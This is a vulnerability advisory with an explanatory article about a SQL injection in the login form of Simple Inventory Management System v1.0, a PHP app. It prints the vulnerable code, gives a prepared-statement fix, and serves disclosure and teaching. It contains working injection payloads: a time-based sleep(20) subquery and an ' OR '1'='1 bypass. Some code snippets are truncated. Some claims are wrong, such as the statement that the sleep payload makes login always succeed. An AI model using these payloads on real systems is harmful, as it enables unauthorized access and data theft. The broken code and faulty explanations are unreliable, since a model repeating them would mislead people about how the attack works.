Simple Inventory Management System v1.0 - 'email' SQL Injection

Exploit Author: SoSPiro Analysis Author: www.bubbleslearn.ir Category: Remote Language: PHP Published Date: 2024-02-26 
# Exploit Title: Simple Inventory Management System v1.0 -  'email'  SQL Injection
# Google Dork: N/A
# Application: Simple Inventory Management System
# Date: 26.02.2024
# Bugs: SQL Injection 
# Exploit Author: SoSPiro
# Vendor Homepage: https://www.sourcecodester.com/
# Software Link: https://www.sourcecodester.com/php/15419/simple-inventory-management-system-phpoop-free-source-code.html
# Version: 1.0
# Tested on: Windows 10 64 bit Wampserver 
# CVE : N/A


## Vulnerability Description:

This code snippet is potentially vulnerable to SQL Injection. User inputs ($_POST['email'] and $_POST['pwd']) are directly incorporated into the SQL query without proper validation or sanitization, exposing the application to the risk of manipulation by malicious users. This could allow attackers to inject SQL code through specially crafted input.


## Proof of Concept (PoC):

An example attacker could input the following values:

email: test@gmail.com'%2b(select*from(select(sleep(20)))a)%2b'
pwd: test

This would result in the following SQL query:

SELECT * FROM users WHERE email = 'test@gmail.com'+(select*from(select(sleep(20)))a)+'' AND password = 'anything'

This attack would retrieve all users, making the login process always successful.

request-response foto:https://i.imgur.com/slkzYJt.png


## Vulnerable code section:
====================================================
ims/login.php

<?php 
ob_start();
session_start();
include('inc/header.php');
$loginError = '';
if (!empty($_POST['email']) && !empty($_POST['pwd'])) {
include 'Inventory.php';
$inventory = new Inventory();

// Vulnerable code
$login = $inventory->login($_POST['email'], $_POST['pwd']); 
//

if(!empty($login)) {
$_SESSION['userid'] = $login[0]['userid'];
$_SESSION['name'] = $login[0]['name'];
header("Location:index.php");
} else {
$loginError = "Invalid email or password!";
}
}
?>



## Reproduce: https://packetstormsecurity.com/files/177294/Simple-Inventory-Management-System-1.0-SQL-Injection.html


SQL Injection in Simple Inventory Management System v1.0: A Critical Security Flaw

On February 26, 2024, a security vulnerability was identified in the Simple Inventory Management System v1.0, a PHP-based open-source application hosted on SourceCodester. The flaw, classified as a SQL Injection vulnerability, resides in the login authentication process and poses a significant risk to any system deploying this software without proper safeguards.

Understanding the Vulnerability

SQL Injection occurs when user input is directly embedded into SQL queries without proper sanitization or validation. In this case, the application accepts email and password inputs via $_POST and uses them in a database query without escaping or parameterized handling.


login($_POST['email'], $_POST['pwd']);
}
?>

This code snippet demonstrates the core issue: the login() method receives raw user input and passes it directly into a SQL query. The absence of input validation or sanitization allows attackers to manipulate the query structure, potentially bypassing authentication or extracting sensitive data.

Proof of Concept: Exploiting the Injection

An attacker can exploit this flaw by crafting malicious input. For example:

  • Email: test@gmail.com'+(select*from(select(sleep(20)))a)+''
  • Password: test

When processed, the resulting SQL query becomes:


SELECT * FROM users WHERE email = 'test@gmail.com'+(select*from(select(sleep(20)))a)+'' AND password = 'test'

Here, the sleep(20) function is used as a time-based blind injection technique. The database will pause for 20 seconds if the query executes successfully, allowing the attacker to confirm the injection's presence through timing analysis. More dangerously, the + operator enables the injection of a subquery that evaluates to a true condition, effectively bypassing the password check.

Even without the sleep function, an attacker could use:


' OR '1'='1

to make the condition email = 'anything' OR '1'='1, which always evaluates to true, granting unauthorized access.

Impact and Risk Assessment

Severity High
Attack Vector Remote, Web-based
Exploitability High (no authentication required)
CVSS Score (Estimated) 8.1 (High)
Potential Damage Full system access, data theft, privilege escalation

This vulnerability is particularly dangerous because it affects the authentication mechanism—the first line of defense in any application. If an attacker can bypass login, they can access all inventory data, user records, and potentially modify or delete entries.

How to Fix: Secure Coding Practices

Eliminating SQL Injection requires adopting secure coding standards. The following fixes should be implemented:


prepare("SELECT * FROM users WHERE email = ? AND password = ?");
$stmt->execute([$_POST['email'], $_POST['pwd']]);
$login = $stmt->fetchAll();
?>

Explanation: This corrected code uses prepared statements with parameterized queries. The input values are passed as parameters, not as part of the SQL string. This ensures that user input cannot alter the query structure, even if it contains SQL syntax.

Additional security measures include:

  • Sanitizing input using filter_var() or htmlspecialchars() for email validation.
  • Implementing rate limiting or account lockout after failed login attempts.
  • Using bcrypt or similar hashing algorithms for password storage, never storing plain text passwords.
  • Enabling logging and monitoring for suspicious login patterns.

Recommendations for Developers and Users

Any user deploying this system should:

  • Immediately patch the login functionality using prepared statements.
  • Review all other user input points—such as search, update, or registration forms—for similar vulnerabilities.
  • Disable public access to the application unless behind a firewall or authenticated proxy.
  • Use automated tools like SQLMap or OWASP ZAP to test for injection vulnerabilities during development.

For open-source projects like this, developers should prioritize security audits before public release. The lack of input validation in a widely distributed system demonstrates how easily insecure code can become a widespread threat.

Conclusion

The Simple Inventory Management System v1.0 serves as a cautionary tale: even basic applications can harbor critical vulnerabilities if security best practices are ignored. SQL Injection remains one of the most prevalent and dangerous web attacks, and its presence in a seemingly simple system underscores the importance of vigilance in every line of code.

Always assume user input is hostile. Validate, sanitize, and use parameterized queries. Security is not an afterthought—it is the foundation.